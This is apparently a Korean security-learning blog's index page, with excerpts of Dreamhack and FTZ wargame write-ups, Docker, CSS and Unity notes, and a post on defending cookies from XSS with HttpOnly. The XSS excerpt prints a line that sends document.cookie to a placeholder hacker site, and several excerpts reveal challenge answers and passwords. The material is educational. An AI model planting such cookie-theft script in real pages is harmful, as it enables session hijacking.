728x90 분류 전체보기720 Dreamhack - 워게임, rev-basic-1 풀이 https://dreamhack.io/wargame/challenges/15/ rev-basic-1 Reversing Basic Challenge #1 이 문제는 사용자에게 문자열 입력을 받아 정해진 방법으로 입력값을 검증하여 correct 또는 wrong을 출력하는 프로그램이 주어집니다. 해당 바이너리를 분석하여 correct를 출 dreamhack.io rev-basic-0번과 비슷한 구조로 짜여있으며, 다만 다른 점은 rev-basic-0은 strcmp로 "문자열의 비교"로 두 문자가 일치한지를 판단하였으면, rev-basic-1은 "문자의 비교"로 한글자 한글자씩 사용자 입력 문자와 정답을 비교했다. 주석 부분을 다 맞춰보면.. "Compar3_the_ch4ract3r"라는 문자열이 나온다. 2021. 12. 1. FTZ - Level 7 /bin/level7를 실행시켜 보았더니 /bin/wrong.txt가 없다고만 계속 뜨고 다른 방법들도 사용해보았지만 아무런 소득을 얻을 수가 없었다.. 결국 검색을 해보았더니 vmware로 ftz를 설치하는 경우에는 /bin/wrong.txt 파일이 없다고 오류가 뜬다고 하네요. 실제 /bin/wrong.txt 파일안에는 아래와 같은 문자들이 있다고 합니다. --_--_- --____- ---_-__ --__-_- 딱 보아도 모스부호인거 같은데, 2진수를 10진수로 바꿀 수 있는가라는 힌트를 보니 이진수로 변환시켜 이를 10진수로 다시 변환해 아스키코드를 찾는 문제인가 봅니다. "-"는 1로 표시하고 "_"는 0으로 표시해서 이진수로 변환해서 윈도우10 계산기 중 프로그래머용으로 바꾸어 10진수로 변환.. 2021. 11. 30. Dreamhack - 워게임, rev-basic-0 풀이 https://dreamhack.io/wargame/challenges/14/ rev-basic-0 Reversing Basic Challenge #0 이 문제는 사용자에게 문자열 입력을 받아 정해진 방법으로 입력값을 검증하여 correct 또는 wrong을 출력하는 프로그램이 주어집니다. 해당 바이너리를 분석하여 correct를 출 dreamhack.io 문제의 실행파일을 실행시키니 사용자에게 입력을 받으며, 아무 글자를 입력하니 Wrong을 출력하고 바로 꺼져버립니다. 목표는 알맞은 정답을 입력해서 Correct를 출력시키는 것이 목표입니다. 문제의 실행파일을 디버거에 넣어 실행시켜 F9를 눌러 엔트리 포인트로 이동해줍니다. 코드를 한번에 실행시키지 않고 한줄한줄씩 코드를 실행시켜 콘솔 창이 변화하는.. 2021. 11. 30. FTZ - Level 6 level6로 접속을 하니 갑자기 힌트가 출력되면서 텔넷 취약점을 이용하라고 한다. 저기서 를 치면 3가지 텔넷 서버가 출력이 된다. 저중 아무거나 접속 요청을 해보았는데 다들 요청만 하다가 putty가 아예 꺼져버린다. ctrl + c를 눌러 강제 종료 시그널을 날려 보았지만 방지가 되어있어서 쉽게 종료는 안 된다. 그밖에 다른 시그널 키도 넣어줘도 작동이 안된다. 단축키 기능 Ctrl + z 백그라운드 전환 Ctrl + d 정상 종료 Ctrl + c 강제 종료 하지만 텔넷 접속기가 실행 되기 이전에 힌트를 알려주는 구간에서 Ctrl + c를 눌러주게 되면? 정상적으로 힌트가 종료되면서 명령어 프롬프트가 나오게 된다. Level7의 비밀번호는 "come together" 2021. 11. 30. 도커 - 기본적인 명령어 모음 pull 도커 이미지 다운로드 docker pull ubuntu:14.04 이미지는 공식 도커 허브에서도 구할 수 있, 대부분이 이미지 이름:이미지 버전 이런 식으로 설치된 이미지들 확인 docker images run 도커 컨테이너 생성 및 생성과 동시에 쉘 접속 docker run "ubuntu:14.04" docker run -i -t ubuntu:14.04 /bin/bash -i : interactive 사용자 입출력 상태로 전환 -d : 데몬 서비스로 실행 start 컨테이너 시작 / stop 컨테이너 종료 docker start 110dc7e4c8aa or blissful_lichterman docker stop 110dc7e4c8aa or blissful_lichterman 고.. 2021. 11. 30. Dreamhack - 워게임, web-misconf-1 https://dreamhack.io/wargame/challenges/45/ web-misconf-1 기본 설정을 사용한 서비스입니다. 로그인한 후 Organization에 플래그를 설정해 놓았습니다. Reference Server Side Basic dreamhack.io 로그인 페이지에서 admin/admin으로 로그인을 해보니 로그인이 성공했다. 그리고 Settings로 이동해서 Organization에 대한 설정 값을 찾아보았더니 플래그 값이 있었다. "초기 계정 설정은 매우 위험하다."라는 위험성을 알려주는 문제인 거 같다. 가정용 공유기들도 이와같은 이슈가 많았다. 2021. 11. 30. 디자인 - 사진 효과 적용 사이트 https://photomosh.com/ PhotoMosh Unlimited creative control for image and video glitching. Distort images, videos or webcam using creative effects. Free and easy to use. Save output as image, gif or video. photomosh.com 이런거 됨 2021. 11. 29. CSS - 미디어 쿼리 /* width under 576px */ @media (max-width: 575px){ body{ background-color: white; } } /* Mobile */ @media (min-width: 576px) and (max-width: 767px){ body{ background-color: red; } } /* Tablet */ @media (min-width: 768px) and (max-width: 991px){ body{ background-color: green; } } /* Desktop */ @media (min-width: 992px) and (max-width: 1199px){ body{ background-color: blue; } } /* width over 1200p.. 2021. 11. 29. 유니티 - 캐릭터 움직이기 애니메이션 우선 애니메이션이 적용되는 모델을 구하고 Animator 폴더를 하나 만들어서 그 안에 Animator Controller를 생성 파일 이름은 MainAnimator 파일을 두번 클릭하면 화면은 애니메이션들을 컨트롤할 수 있는 컨트롤 창을 뜨게 한다. 저곳에다 여러 애니메이션 객체들을 끌여 당겨서 연결을 시켜주면 된다. 점프 후에 WAIT01 애니메이션이 작동하게 연결해줌 그리고 다시 캐릭터 모델의 Inspector을 확인해 Animator 컴포넌트에 Controller를 아까 생성해서 설정한 MainAnimator를 적용. 이제 스크립트를 써준다. [Main Controller.cs] using System.Collections; using System.Collections.Generic; using .. 2021. 11. 28. 유니티 - 카메라 플레이어에게 고정하기 [FollowPlayer.cs] using System.Collections; using System.Collections.Generic; using UnityEngine; public class FollowPlayer : MonoBehaviour { public GameObject player; // Start is called before the first frame update void Start() { } // Update is called once per frame void Update() { transform.position = player.transform.position + new Vector3(0, 1.5f, -8) ; } } Player 값을 줄 때에는 오른쪽에 아주 작은 동그라미가 보.. 2021. 11. 28. 유니티 - 가장 기본적인 위치 이동 [Basic_Move.cs] using System.Collections; using System.Collections.Generic; using UnityEngine; public class Basic_Move : MonoBehaviour { public int Speed; // Start is called before the first frame update void Start() { } // Update is called once per frame void Update() { if( Input.GetKey (KeyCode.LeftArrow) ){ transform.Translate ( Vector3.left * Speed * Time.deltaTime ); } if( Input.GetKey (Key.. 2021. 11. 28. 웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly) 해커는 아래처럼 document.cookie를 통해 중요한 쿠키 정보들을 수집하는 게 일반적 location.href = 'http://해커사이트/?cookies=' + document.cookie; 서버가 클라이언트에게 쿠키 값을 지정할 때에 HttpOnly라는 옵션을 추가시켜주면, (HttpOnly가 Http만 허용하고, Https는 허용하지 않는다 이게 아니다..) 클라이언트가 document.cookie를 아무리 출력해 보아도 해당 쿠키에 대한 정보는 출력이 되지 않는다. Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly HttpOnly 설정을 한 쿠키는 브라우저가 접근을 할 수 없도록 되버린 것. 당연히 서버에게 GET, POST 요청등을 할 때에는 HttpOnly 설정된 쿠키.. 2021. 11. 25. 이전 1 ··· 52 53 54 55 56 57 58 ··· 60 다음 728x90
HackLog
